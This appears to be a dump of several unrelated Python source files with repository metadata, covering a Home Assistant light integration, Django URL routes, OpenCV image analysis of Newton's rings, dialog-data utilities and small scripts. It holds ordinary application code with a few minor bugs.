"""Representation of an Freedompro light."""
def __init__(self, hass, api_key, device, coordinator):
"""Initialize the Freedompro light."""
super().__init__(coordinator)
self._session = aiohttp_client.async_get_clientsession(hass)
self._api_key = api_key
self._attr_name = device["name"]
self._attr_unique_id = device["uid"]
self._attr_device_info = DeviceInfo(
identifiers={
(DOMAIN, self.unique_id),
},
manufacturer="Freedompro",
model=device["type"],
name=self.name,
)
self._attr_is_on = False
self._attr_brightness = 0
color_mode = COLOR_MODE_ONOFF
if "hue" in device["characteristics"]:
color_mode = COLOR_MODE_HS
elif "brightness" in device["characteristics"]:
color_mode = COLOR_MODE_BRIGHTNESS
self._attr_color_mode = color_mode
self._attr_supported_color_modes = {color_mode}
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
device = next(
(
device
for device in self.coordinator.data
if device["uid"] == self._attr_unique_id
),
None,
)
if device is not None and "state" in device:
state = device["state"]
if "on" in state:
self._attr_is_on = state["on"]
if "brightness" in state:
self._attr_brightness = round(state["brightness"] / 100 * 255)
if "hue" in state and "saturation" in state:
self._attr_hs_color = (state["hue"], state["saturation"])
super()._handle_coordinator_update()
async def async_added_to_hass(self) -> None:
"""When entity is added to hass."""
await super().async_added_to_hass()
self._handle_coordinator_update()
async def async_turn_on(self, **kwargs):
"""Async function to set on to light."""
payload = {"on": True}
if ATTR_BRIGHTNESS in kwargs:
payload["brightness"] = round(kwargs[ATTR_BRIGHTNESS] / 255 * 100)
if ATTR_HS_COLOR in kwargs:
payload["saturation"] = round(kwargs[ATTR_HS_COLOR][1])
payload["hue"] = round(kwargs[ATTR_HS_COLOR][0])
payload = json.dumps(payload)
await put_state(
self._session,
self._api_key,
self._attr_unique_id,
payload,
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Async function to set off to light."""
payload = {"on": False}
payload = json.dumps(payload)
await put_state(
self._session,
self._api_key,
self._attr_unique_id,
payload,
)
await self.coordinator.async_request_refresh()
| [
"noreply@github.com"
] | JeffLIrion.noreply@github.com |
87b10db60bedbe9be2a069f490c9007cf0d4cdfc | 4683ab4a90067ff7c2f7c3b952eb8268713ca1b8 | /meteoweb/urls.py | decc0a8d5973c7ba42c84287180df9f7d86a5276 | [] | no_license | karpov-sv/favor2 | 068fda8c0acbd54bbec1e57c69617e0e60bc462e | 668085a495436888a7b031bdf6b161908f6d73cc | refs/heads/master | 2023-04-26T01:52:22.621648 | 2021-05-13T11:46:50 | 2021-05-13T11:46:50 | 285,786,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,323 | py | from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.conf.urls import patterns, include, url
from django.views.generic import DetailView, ListView
from django.db.models import Count
from models import *
from views import *
urlpatterns = patterns('',
# List of nights with some statistical info
url(r'^nights/?$', ListView.as_view(
queryset=MeteoImages.objects.order_by('-night').values('night').annotate(nimages=Count('night')),
context_object_name='nights',
template_name='nights.html'),
name='nights'),
# Log view
url(r'^$', 'meteoweb.views.current', name='current'),
url(r'^current.jpg$', 'meteoweb.views.current_image', name='current_image'),
# List of images with previews
url(r'^images(/(night/(?P<night>\w+))?)?(/(?P<type>\w+))?$', ImagesListView.as_view(), name='images_night'),
# Detailed image view
url(r'^images/(?P<pk>\d+)/$', ImageDetailView.as_view(), name='images'),
# Viewing and downloading image itself
url(r'^images/(?P<id>\d+)/view', 'meteoweb.views.image_jpeg', {'size' : 800}, name="image_view"),
url(r'^images/(?P<id>\d+)/preview', 'meteoweb.views.image_jpeg', {'size' : 64}, name="image_preview"),
# Sky Quality Meter
url(r'^sqm/(?P<field>\w+)/current.jpg', 'meteoweb.views.current_sqm', {'size': 1000, 'field': 'brightness'}, name='current_sqm'),
# Boltwood Cloud Sensor II
url(r'^meteo/(?P<field>\w+)/current.jpg', 'meteoweb.views.current_meteo', {'size': 1000}, name='current_sqm'),
# Tabular output
url(r'^current.txt', 'meteoweb.views.current_table', name='current_table'),
# Robots
url(r'^robots.txt$', lambda r: HttpResponse("User-agent: *\nDisallow: /", mimetype="text/plain")),
)
urlpatterns += staticfiles_urlpatterns()
| [
"karpov.sv@gmail.com"
] | karpov.sv@gmail.com |
dc07e2cccb0fdb9ae7c3fbd8dc0d06b9049e4223 | f52db9779023c3a007bf7f712dada1ae30307366 | /edge_detect.py | dd4f7e948bff7c4c4084eafee9b4b6f7204020c5 | [] | no_license | hemangdtu/Newtons_Rings_IR_Algorithm | 16b86f9d7490e0f560f59f81b0137b706c979ab5 | dd494aa8d363c9d8b6bb83cff59ef860c3727e48 | refs/heads/master | 2023-04-07T09:02:59.885671 | 2021-04-08T07:18:55 | 2021-04-08T07:18:55 | 354,702,917 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,043 | py | import cv2
import numpy as np
from matplotlib import pyplot as plt
from scipy.signal import argrelmin
import sys
#read input image, resize it if needed, and apply a basic gaussian blur to remove
#high-frequency noise
img = cv2.imread("test_1.jpg",0)
img = cv2.resize(img,(0,0), fx=1,fy=1)
img = cv2.medianBlur(img,5)
#rescale color space from rbg to bw
cimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)
bwimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)
#apply the hough transform to obtain detected circles in the image
#circles should be an array with each element of the form [xpos, ypos, radius]
circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,5,50,param1=110,param2=80,minRadius=40,maxRadius=0)
circles = np.uint16(np.around(circles))
#obtain the center of the image for size calculations
center = np.array(np.shape(img)) / 2.0
# iterate through all circles found, and draw those within a certain radius of the center of the image
# to filter out the stuff we don't want
# also choose one of these circles to be the one we use, and save it's center point -- This is a bit of a bodge, as it simply
# pulls a random circle - in theory, this is the only one that should be found, but this isn't always certain depending on noise
trueCenter = None
for i in circles[0]:
if((np.abs(i[1] - center[0]) ** 2 + np.abs(i[0] - center[1]) ** 2) ** 0.5 < 35 ):
trueCenter = i
# draw the outer circle
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
#transform to polar and draw image - do this twice, once for the image to display,
#and once for the one to do the math on (which should not have debug graphics - eg the center of the circle drawn)
size = int(np.shape(img)[0]/2)
dst = cv2.warpPolar(cimg,(size,size), (trueCenter[0],trueCenter[1]), maxRadius= size, flags = cv2.WARP_POLAR_LINEAR)
dst2 = cv2.warpPolar(bwimg,(size,size), (trueCenter[0],trueCenter[1]), maxRadius= size, flags = cv2.WARP_POLAR_LINEAR)
#plot intensities and figures
fig = plt.figure()
plt.subplot(2, 2, 1)
plt.imshow(cimg)
plt.subplot(2, 2, 2)
#plot pixel intensities from center to the side of the image (bad way)
plt.plot(range(0,len(bwimg[trueCenter[1]]))[trueCenter[0]:],[i[1] for i in bwimg[trueCenter[1]]][trueCenter[0]:])
plt.subplot(2, 2, 3)
plt.imshow(dst)
plt.subplot(2, 2, 4)
#Find the average value of each column in the transformed image, and plot that value instead (better way)
plt.xlabel("Pixel Distance")
plt.ylabel("Average Intensity")
average_val = [sum([dst2[j][i][1] for j in range(0,len(dst[i]))]) / len(dst[i]) for i in range(0, len(dst))]
plt.plot(range(0,len(dst)), average_val)
#find local minima, and plot those on the graph. also print them (pixel distances)
mins = argrelmin(np.array(average_val), order=1)
plt.plot(mins[0][1:],[average_val[i] for i in mins[0][1:]], 'gx')
file1 = open(r"output.txt","w")
# [print(i) for i in mins[0][1:12]]
for i in mins[0][1:12]:
file1.write(str(i)+"\n")
file1.close()
plt.show()
| [
"noreply@github.com"
] | hemangdtu.noreply@github.com |
50c7ce0573bcae59abf94a12ef429ee067e6955a | c44b0322e47dcf52b3b542a0806f96fb22cb3e7f | /hacker_rank/spiral_print.py | b8435f02b0b96ad580adceaf90922310c19dd8a4 | [] | no_license | jcshott/interview_prep | b56a332f5c9a8d68d81afbb541911d70afb9fe35 | 567eb1e7b047f1917c008dd1eec98acf8043a7e7 | refs/heads/master | 2020-04-06T07:05:57.788289 | 2016-08-02T16:46:52 | 2016-08-02T16:46:52 | 42,322,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
def print_spiral(matrix):
top = 0
bottom = len(matrix)-1
left = 0
right = len(matrix[0]) -1
output = []
while True:
#print "left", left
#print "right", right
#print "top", top
#print "bottom", bottom
# print top row
for x in matrix[top][left:right+1]:
output.append(x)
top += 1
if top > bottom or left > right:
break
#print right col
for r in range(top, len(matrix)):
output.append(matrix[r][right])
right -= 1
if top > bottom or left > right:
break
# print bottom
for b in range(len(matrix[0])-(left+right)-1,left-1, -1):
#print "b", b
output.append(matrix[bottom][b])
bottom -= 1
if top > bottom or left > right:
break
#print left col
for l in range(len(matrix)-(bottom+top), top-1, -1):
output.append(matrix[l][left])
left += 1
if top > bottom or left > right:
break
print ",".join(output)
# build matrix
matrix_size = raw_input().split(",")
_matrix = []
for x in range(int(matrix_size[0])):
row = raw_input().split(",")
_matrix.append(row)
print_spiral(_matrix)
| [
"jcshott@gmail.com"
] | jcshott@gmail.com |
f6b95fd1f667cbd84a3615a2192f85e37e2fa813 | 1b80c265ea585a9d96646afb40093a87874d09ca | /practises/test.py | fb134db5939d70d6f9023336f5d5f53795ffec18 | [] | no_license | gtopcular/OPENCVPRACTISE | 4e45e637d15d7d0968dbc881f89dd63678512df6 | 9b119e20371c0f8ad8724974f37301d5454e4cd2 | refs/heads/master | 2022-07-24T03:03:58.574445 | 2020-05-25T10:52:59 | 2020-05-25T10:52:59 | 255,631,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | import cv2
img =cv2.imread("./sources/helikopter.jpg',0)
cv2.imshow('helikopter.jpg',img)
dugme = cv2.waitKey(0)
if dugme == 27:
cv2.destroyAllWindows()
else :
cv2.imwrite("gri_helikopter.jpg",img) | [
"gtopcular@hotmail.com"
] | gtopcular@hotmail.com |
07a7bc52717aa5b1417895ba4f41a774881dd48b | d8bf91fc51b4fd05246097e5c7e5aa07771b1068 | /myenv/bin/pilfont.py | b091656756f12cc2c63007772af750d1c659a489 | [] | no_license | falcon1996/Gallery | 9d51bfba32fe06600a9b49991c99c106003a945f | e1c37d1e7cd02d1d878d5ea0107292248e4fdce9 | refs/heads/master | 2021-06-17T04:16:14.233354 | 2017-04-23T00:29:57 | 2017-04-23T00:29:57 | 82,963,158 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | #!/home/dhruv/Documents/galleryProject/myenv/bin/python3
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"
if len(sys.argv) <= 1:
print("PILFONT", VERSION, "-- PIL font compiler.")
print()
print("Usage: pilfont fontfiles...")
print()
print("Convert given font files to the PIL raster font format.")
print("This version of pilfont supports X BDF and PCF fonts.")
sys.exit(1)
files = []
for f in sys.argv[1:]:
files = files + glob.glob(f)
for f in files:
print(f + "...", end=' ')
try:
fp = open(f, "rb")
try:
p = PcfFontFile.PcfFontFile(fp)
except SyntaxError:
fp.seek(0)
p = BdfFontFile.BdfFontFile(fp)
p.save(f)
except (SyntaxError, IOError):
print("failed")
else:
print("OK")
| [
"dhruvparashar6@gmail.com"
] | dhruvparashar6@gmail.com |
0421a604d86c26b00cb7894e3a3d2bac5afddb39 | b12d2e8d296f8ca6ac72acfae65566e9c2f65e0d | /scripts/data_utils.py | 5952a24aaba2223c962be20ad30849ad9611140a | [] | no_license | yyincc/experiment1_hie_dstc2 | 6380210c92bc69b64a0dd1d82a65ab70e25f64e2 | d6f4f896a8d2889ea6b059d70331ac3f3fb3482b | refs/heads/master | 2020-03-25T22:00:30.664020 | 2018-08-11T20:38:00 | 2018-08-11T20:38:00 | 144,200,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,592 | py |
import numpy as np
import json
from itertools import chain
import re
from sklearn.model_selection import train_test_split
import operator
from copy import deepcopy
from functools import reduce
from spacy.lang.en import English
from score import do_compute_score, do_load_json_result
import gensim
from tqdm import tqdm
### The current dialog format
### [{dialog_id : " ",
# utterances: [" "],
# candidates: [{candidate_id: " " , utterance: ""}, ... ],
# answer: {candidate_id: " " , utterance: ""} ]
nlp=English()
def load_task(path_to_data, FLAGS, cand_idx_out={}):
json_data = []
nlp=English()
for task_dir in path_to_data:
fd = open(task_dir, 'rb')
json_data += json.load(fd)
fd.close()
train = json_data
train = get_stories(train, FLAGS.speaker_info, FLAGS.time_info_sents,user_in=FLAGS.user_in)
if FLAGS.main_task=='slot_tracking':
train=[t for t in train if str(t['a'][0]) == 'api_call']
# train, val = train_test_split(train, test_size=0, random_state=FLAGS.random_state)
return train, []
def process(dataset):
for id in range(len(dataset)):
utterances=dataset[id]['utterances']
user=dataset[id]['user']
bot=dataset[id]['bot']
dataset[id]['utterances']=[]
dataset[id]['user']=[]
dataset[id]['bot']=[]
for i in range(len(utterances)):
dataset[id]['utterances'].append(tokenize(utterances[i][0]))
for i in range(len(user)):
dataset[id]['user'].append(tokenize(user[i][0]))
for i in range(len(bot)):
dataset[id]['bot'].append(tokenize(bot[i][0]))
def load_test(path_to_data,FLAGS):
json_data = []
for task_dir in path_to_data:
fd = open(task_dir, 'rb')
json_data += json.load(fd)
fd.close()
test = get_stories(json_data, FLAGS.speaker_info, FLAGS.time_info_sents,user_in=FLAGS.user_in)
if FLAGS.main_task=='slot_tracking':
test=[t for t in test if str(t['a'][0]) == 'api_call']
return test
def loadEmbedding_rand(path, word_indices, binary,divident = 1.0): # TODO double embedding
"""
Load embeddings. Doing a random normal initialization for OOV words.
"""
n = len(word_indices)
m = 300
emb = np.empty((n+1, m), dtype=np.float32)
emb[:,0:300] = np.random.normal(size=(n+1,300)) / divident
emb[0, :] = np.zeros((1,m), dtype="float32")
if path !=None:
model = gensim.models.KeyedVectors.load_word2vec_format(path, binary=binary)
for word in word_indices.keys():
try:
emb[word_indices[word], 0:300] = model[word]
except KeyError:
print(word)
continue
return emb
def get_stories(json_data,speaker_info, time_info_sents, user_in=False, testing=False):
'''Parse stories provided in the tasks format
'''
data = []
for story in tqdm(json_data):
utterances_origin = story['utterances']
utterances_list = []
a_list = []
utterances_list.append(utterances_origin)
a_list.append( tokenize(story['answer']['utterance']) )
utterances_list_counter = 0
for utterances in utterances_list:
storyInfo = {}
utter_list = []
history=[]
utter_counter = 0
speaker_type_list, time_list = get_add_info(utterances)
for utter in utterances[:len(utterances)-1]:
add_item = []
if time_info_sents: add_item += [time_list[utter_counter]]
if speaker_info: add_item += [speaker_type_list[utter_counter]]
utter_list.append(add_item+[token.text for token in nlp(utter)])
history.append(tokenize(utter))
if user_in:
if '$user' in add_item:
utter_list.append(tokenize(utter))
else:
utter_list.append(add_item+tokenize(utter))
utter_counter += 1
# add item to last question from user
add_item_q = []
if time_info_sents: add_item_q += [time_list[-1]]
if speaker_info: add_item_q += ['speaker_user']
#q = add_item_q + [token.text for token in nlp(utterances[len(utterances)-1])]
q = add_item_q + tokenize(utterances[len(utterances)-1])
a = a_list[utterances_list_counter] if not testing else []
storyInfo['dialog_id'] = story['dialog_id']
storyInfo['history'] = history
storyInfo['utterances'] = utter_list
storyInfo['a'] = a
data.append(storyInfo)
utterances_list_counter += 1
return data
def get_add_info(utterances):
"""
return who speaks the utterance and when is it
"""
time_list = []
speaker_type_list = []
speaker_type = ["$user", "$bot", '$options']
start = 0
counter = 0
for utter in utterances:
token = tokenize(utter)
if is_option(token):
speaker_type_list.append(speaker_type[2])
time_list.append('time-api')
else:
time_list.append('time{}'.format( int(np.ceil((counter+1)*1.0/2)) ) )
speaker_type_list.append(speaker_type[counter%2])
counter += 1
return speaker_type_list, time_list
def get_cand2idx(data, all_utter=False):
"""
return dictionary of candidates bot answers
"""
cand_list = []
for d in data:
c = [ x['utterance'] for x in d['cand_list'] ]
a = d['a'][:-1]
utters = d['utter_list']
for c_i in c:
if 'unk' not in c_i:
cand_list.append(" ".join(c_i))
cand_list.append(" ".join(a))
for utter in utters:
if '$user' in utter or '$options' in utter:
if all_utter and '$user' in utter:
cand_list.append("$ "+" ".join(utter[2:]))
continue
else:
cand_list.append(" ".join(utter[2:]))
cand_list = list(set(cand_list))
cand_idx = dict((c, i+1) for i, c in enumerate(cand_list))
cand_idx['UNK-SENT'] = 0
candidates = []
for cand in cand_idx.keys():
candidates.append(tokenize(cand))
return cand_idx
def is_option(token_sentence):
if len(token_sentence) == 3 and ('r_' in token_sentence[1][:2] or 'R_' in token_sentence[1][:2] ):
return True
else:
return False
def get_story_cand_idx(data, cand_idx):
cand_per_story = []
n_cand = len(cand_idx)
for d in data:
c = d['cand_list']
temp = []
for c_i in c:
if 'unk' not in c_i['utterance']:
str_utter =" ".join(c_i['utterance'])
if str_utter not in cand_idx:
max_score_idx = find_similar_candidate(cand_idx, c_i['utterance'])
temp.append( { 'candidate_id': c_i['candidate_id'], 'utterance': c_i['utterance'] ,'idx': max_score_idx } )
else:
temp.append( { 'candidate_id': c_i['candidate_id'], 'utterance': c_i['utterance'] ,'idx': cand_idx[" ".join(c_i['utterance'])] } )
else:
temp.append( { 'candidate_id': c_i['candidate_id'], 'utterance': c_i['utterance'] ,'idx': 0 })
cand_per_story.append(temp)
return cand_per_story
def find_similar_candidate(cand_idx, ref):
scores = []
for cand, idx in cand_idx.items():
token_cand = tokenize(cand)
score = 0
for pos, word in enumerate(ref):
if pos < len(token_cand):
if word == token_cand[pos]:
score += 1
scores.append([ idx, score])
scores = sorted(scores, key=lambda tup: tup[1], reverse=True)
if scores!=[]:
max_score_idx = scores[0][0] if scores[0][1]!=0 else 0
else:
max_score_idx = 0
return max_score_idx
def build_vocab(data, candidates=[]):
if candidates!=[]:
vocab = reduce(lambda x, y: x | y, (set(list(chain.from_iterable(d['utter_list'])) + d['q'] ) for d in data))
vocab |= reduce(lambda x,y: x|y, (set(candidate) for candidate in candidates) )
vocab = sorted(vocab)
else:
vocab = []
for d in data:
s, q, a = d['utter_list'], d['q'], d['a']
c = [ x['utterance'] for x in d['cand_list'] ]
words = set(list(chain.from_iterable(s)) + q + a + list(chain.from_iterable(c)))
for word in words:
if word not in vocab:
vocab.append(word)
return vocab
def data_information(data,FLAGS, candidates=[],officialtestfile=[]):
dataset=[]
for i in data:
dataset+=i
data=dataset
vocab=set()
for i in data:
for j in i['utterances']:
vocab=vocab | set(j)
vocab = list(vocab)
word_idx = dict((c, i + 1) for i, c in enumerate(vocab))
max_story_size = max(map(len, (d['utterances'] for d in data) ))
mean_story_size = int(np.mean([ len(d['utterances']) for d in data ]))
sentence_size = max(map(len, chain.from_iterable(d['utterances'] for d in data)))
return vocab, word_idx, max_story_size, mean_story_size, sentence_size
def tokenize(sent):
#sent=sent.lower()
#return sent.split(' ')
'''Return the tokens of a sentence including punctuation.
>>> tokenize('Bob dropped the apple. Where is the apple?')
['Bob', 'dropped', 'the', 'apple', '.', 'Where', 'is', 'the', 'apple']
'''
sent=sent.lower()
STOP_WORDS=["'s",",","-",".","<",">","a","of","to"]
result= [token.text for token in nlp(sent) if token.text not in STOP_WORDS]
# STOP_WORDS=set(["a","an","the"])
# sent=sent.lower()
# if sent=='<silence>':
# return [sent]
# result=[x.strip() for x in re.split('([^A-Za-z_0-9#]+)?', sent) if x.strip() and x.strip() not in STOP_WORDS]
# if not result:
# result=['<silence>']
# if result[-1]=='.' or result[-1]=='?' or result[-1]=='!':
# result=result[:-1]
return result
def vectorize_data(data, word_idx, sentence_size, batch_size, memory_size, cand_idx,FLAGS):
S, A ,Label= [], [], []
for i, d in enumerate(data):
story, answer = d['utterances'], d['goal']
ss = []
for _, sentence in enumerate(story, 1):
ww = []
ls = max(0, sentence_size - len(sentence))
for w in sentence:
if w in word_idx:
ww.append(word_idx[w])
else:
print(w)
ss.append(ww+[0] * ls)
ss = ss[::-1][:memory_size][::-1]
# pad to memory_size
lm = max(0, memory_size - len(ss))
for _ in range(lm):
ss.append([0] * sentence_size)
y=[]
for i in range(len(answer)):
y .append([cand_idx[0][answer[i]['area']],cand_idx[1][answer[i]['food']],cand_idx[2][answer[i]['price range']]])
for _ in range(max(0, memory_size - len(answer))):
y.append([0,0,0])
if len(answer):
label = [cand_idx[0][answer[-1]['area']],cand_idx[1][answer[-1]['food']],cand_idx[2][answer[-1]['price range']]]
else:
label = 0
S.append(ss)
A.append(y)
Label.append(label)
# if len(answer):
# y = [cand_idx[0][answer[-1]['area']],cand_idx[1][answer[-1]['food']],cand_idx[2][answer[-1]['price range']]]
# else:
# y = 0
#
# S.append(ss)
# A.append(y)
return S, A ,Label
def vectorize_candidates(cand_idx, idx_cand, word_idx, sentence_size):
C=[]
cand_idx_temp = sorted(cand_idx.items(), key=operator.itemgetter(1))
counter = 0
for candidate, idx in cand_idx_temp:
assert idx == cand_idx[candidate]
assert idx == counter
token_candidate = tokenize(candidate)
user_utter = True if '$' in token_candidate else False
if user_utter:
token_candidate = token_candidate[1:]
del cand_idx[candidate]
cand_idx[" ".join(token_candidate)] = idx
lc=max(0,sentence_size-len(token_candidate))
if user_utter:
#print candidate
C.append([0 for w in token_candidate] + [0] * lc)
else:
C.append([word_idx[w] if w in word_idx else 0 for w in token_candidate] + [0] * lc)
counter += 1
idx_cand = dict((i, c) for c, i in cand_idx.items()) if cand_idx!=[] else []
return C, cand_idx, idx_cand
def get_pred_10cands(candsInfo, pred_pro, dialogID=[], rm_unk_sent=False, data=[], idx_cand=[], testInfo=[]):
preds_only_ten = []
preds_cand_rank = [] # { 'dialog_id': '', 'lst_candidate_id': [ {'candidate_id': '', 'rank': ''}, ...]}
for i in range(len(pred_pro)):
cands = [ x['idx'] for x in candsInfo[i]]
pred_pro_cands = pred_pro[i][cands]
if rm_unk_sent:
for idx, cand in enumerate(cands):
if cand == 0:
pred_pro_cands[idx] = -100
pred_ans_idx = np.argmax(pred_pro_cands)
preds_only_ten.append(cands[pred_ans_idx])
lst_candidate_id = []
dialog_ranking = {'dialog_id': dialogID[i]}
sort_index = np.argsort( np.array(pred_pro_cands) )
sort_value = np.sort( np.array(pred_pro_cands) )
sort_index = sort_index[::-1]
sort_value = sort_value[::-1]
for ii in range(len(sort_index)):
lst_candidate_id.append( {'candidate_id': candsInfo[i][sort_index[ii]]['candidate_id'], 'rank': str(ii+1) } )
# Postprocess, deal with addition slot, find the most recent entity in dialog information
if data!=[] and idx_cand!=[] and testInfo!=[]:
if sort_value[0] == sort_value[1]:
c = data[i]['cand_list']
highest_template = idx_cand[ cands[sort_index[0]] ]
for c_i in c:
strdiff = ' '.join(c_i['utterance']).replace(highest_template,"").replace(" ","")
possKey = 'R_'+strdiff[3:-3]
if highest_template in ' '.join(c_i['utterance']) and \
possKey in testInfo[i].keys() and \
str(len(testInfo[i][possKey])) in c_i['utterance'][-1]:
highest_cand_id = c_i['candidate_id']
for lst_id in lst_candidate_id:
if lst_id['candidate_id']==highest_cand_id:
temp = lst_id['rank']
lst_id['rank'] = '1'
break
for lst_id2 in lst_candidate_id:
if lst_id2['rank']=='1' and lst_id2['candidate_id']!=highest_cand_id:
lst_id2['rank']=temp
break
#print 'Choose:', c_i['utterance']
break
dialog_ranking['lst_candidate_id'] = lst_candidate_id
preds_cand_rank.append(dialog_ranking)
return preds_only_ten, preds_cand_rank
def get_type_dict(kb_path):
type_dict = {'R_restaurant':[]}
fd = open(kb_path, 'rb')
for line in fd:
x = line.split('\t')[0].split(' ')
rest_name = x[1]
entity = x[2]
entity_value = line.split('\t')[1].replace('\n','')
if rest_name not in type_dict['R_restaurant']:
type_dict['R_restaurant'].append(rest_name)
if entity not in type_dict.keys():
type_dict[entity] = []
if entity_value not in type_dict[entity]:
type_dict[entity].append(entity_value)
return type_dict
def combine_SQ(SQ):
newS = []
for i in range(len(SQ)):
newSQ = SQ[i][0]+[SQ[i][1]]
newSQ = [' '.join(x) for x in newSQ]
newS.append(newSQ)
return np.array(newS)
def shuffle_array(shuffle_array_list, shuffle_idx):
for shuffle_array in shuffle_array_list:
shuffle_array = shuffle_array[shuffle_idx]
def batch_evaluate(model, S, A, n_data, eval_batch):
preds = np.empty((0,3),dtype=int)
preds_cui = np.empty((0,1),dtype=int)
preds_loc = np.empty((0,1),dtype=int)
preds_pri = np.empty((0,1),dtype=int)
preds_prob = []
losses = 0.0
total_batch = int(len(S) / eval_batch)
jj=int(len(S)!=total_batch*eval_batch)
batches=[(eval_batch * i,eval_batch * (i + 1)) if eval_batch * (i + 1) <= len(S) else (eval_batch * i,len(S)) for i in range(total_batch+jj)]
prog_bar = tqdm(batches)
for start, end in prog_bar:
end = start + eval_batch
s = S[start:end]
if A!=[]:
a = A[start:end]
pred, loss,pred_cui,pred_loc,pred_pri = model.predict(s, a)
losses += loss
else:
pred = model.predict(s)
# preds_prob += list(model.predict_proba(s))
preds =np.concatenate((preds,pred),0)
preds_cui =np.concatenate((preds_cui,pred_cui[:,None]),0)
preds_loc =np.concatenate((preds_loc,pred_loc[:,None]),0)
preds_pri =np.concatenate((preds_pri,pred_pri[:,None]),0)
return preds, 0, losses/(n_data/eval_batch),preds_cui,preds_loc,preds_pri
| [
"yangyang950418@outlook.com"
] | yangyang950418@outlook.com |
00796d3b3a4472968a31b50cfda2cb973bf04186 | 2b08e2af586db3b290773bf579ba243962b5e7d5 | /interactivo.py | d1758cd6945e8311071ff7ed59a2a6a6013fd7a5 | [] | no_license | schiob/python-ciencias-basicas | e7fa4332e3038993c81388272280c4da90812959 | 433a210f1a80ecdbd6a70df468d9e579ff26df7e | refs/heads/main | 2023-06-05T05:10:15.130329 | 2021-06-24T00:20:55 | 2021-06-24T00:20:55 | 378,769,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,728 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button
# The parametrized function to be plotted
def f(t, amplitude, frequency):
return amplitude * np.sin(2 * np.pi * frequency * t)
t = np.linspace(0, 1, 1000)
# Define initial parameters
init_amplitude = 5
init_frequency = 3
# Create the figure and the line that we will manipulate
fig, ax = plt.subplots()
line, = plt.plot(t, f(t, init_amplitude, init_frequency), lw=2)
ax.set_xlabel('Time [s]')
axcolor = 'lightgoldenrodyellow'
ax.margins(x=0)
# adjust the main plot to make room for the sliders
plt.subplots_adjust(left=0.25, bottom=0.25)
# Make a horizontal slider to control the frequency.
axfreq = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)
freq_slider = Slider(
ax=axfreq,
label='Frequency [Hz]',
valmin=0.1,
valmax=30,
valinit=init_frequency,
)
# Make a vertically oriented slider to control the amplitude
axamp = plt.axes([0.1, 0.25, 0.0225, 0.63], facecolor=axcolor)
amp_slider = Slider(
ax=axamp,
label="Amplitude",
valmin=0,
valmax=10,
valinit=init_amplitude,
orientation="vertical"
)
# The function to be called anytime a slider's value changes
def update(val):
line.set_ydata(f(t, amp_slider.val, freq_slider.val))
fig.canvas.draw_idle()
# register the update function with each slider
freq_slider.on_changed(update)
amp_slider.on_changed(update)
# Create a `matplotlib.widgets.Button` to reset the sliders to initial values.
resetax = plt.axes([0.8, 0.025, 0.1, 0.04])
button = Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')
def reset(event):
freq_slider.reset()
amp_slider.reset()
button.on_clicked(reset)
plt.show() | [
"schiob4@gmail.com"
] | schiob4@gmail.com |
e4a39f7dc670a9334da406a630aee065d7152554 | 0e478f3d8b6c323c093455428c9094c45de13bac | /src/OTLMOW/OTLModel/Datatypes/KlAlgSnelheidsregime.py | 421b590ae8912821efe765805334d2de3ff76636 | [
"MIT"
] | permissive | davidvlaminck/OTLMOW | c6eae90b2cab8a741271002cde454427ca8b75ba | 48f8c357c475da1d2a1bc7820556843d4b37838d | refs/heads/main | 2023-01-12T05:08:40.442734 | 2023-01-10T15:26:39 | 2023-01-10T15:26:39 | 432,681,113 | 3 | 1 | MIT | 2022-06-20T20:36:00 | 2021-11-28T10:28:24 | Python | UTF-8 | Python | false | false | 3,552 | py | # coding=utf-8
import random
from OTLMOW.OTLModel.Datatypes.KeuzelijstField import KeuzelijstField
from OTLMOW.OTLModel.Datatypes.KeuzelijstWaarde import KeuzelijstWaarde
# Generated with OTLEnumerationCreator. To modify: extend, do not edit
class KlAlgSnelheidsregime(KeuzelijstField):
"""De snelheidsregimes met variabele mogelijkeid."""
naam = 'KlAlgSnelheidsregime'
label = 'Snelheidsregime'
objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#KlAlgSnelheidsregime'
definition = 'De snelheidsregimes met variabele mogelijkeid.'
status = 'ingebruik'
codelist = 'https://wegenenverkeer.data.vlaanderen.be/id/conceptscheme/KlAlgSnelheidsregime'
options = {
'120': KeuzelijstWaarde(invulwaarde='120',
label='120',
status='ingebruik',
definitie='120 km/h.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/120'),
'30': KeuzelijstWaarde(invulwaarde='30',
label='30',
status='ingebruik',
definitie='30 km/h.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/30'),
'50': KeuzelijstWaarde(invulwaarde='50',
label='50',
status='ingebruik',
definitie='50 km/h.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/50'),
'60': KeuzelijstWaarde(invulwaarde='60',
label='60',
status='ingebruik',
definitie='60 km/h.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/60'),
'70': KeuzelijstWaarde(invulwaarde='70',
label='70',
status='ingebruik',
definitie='70 km/h.',
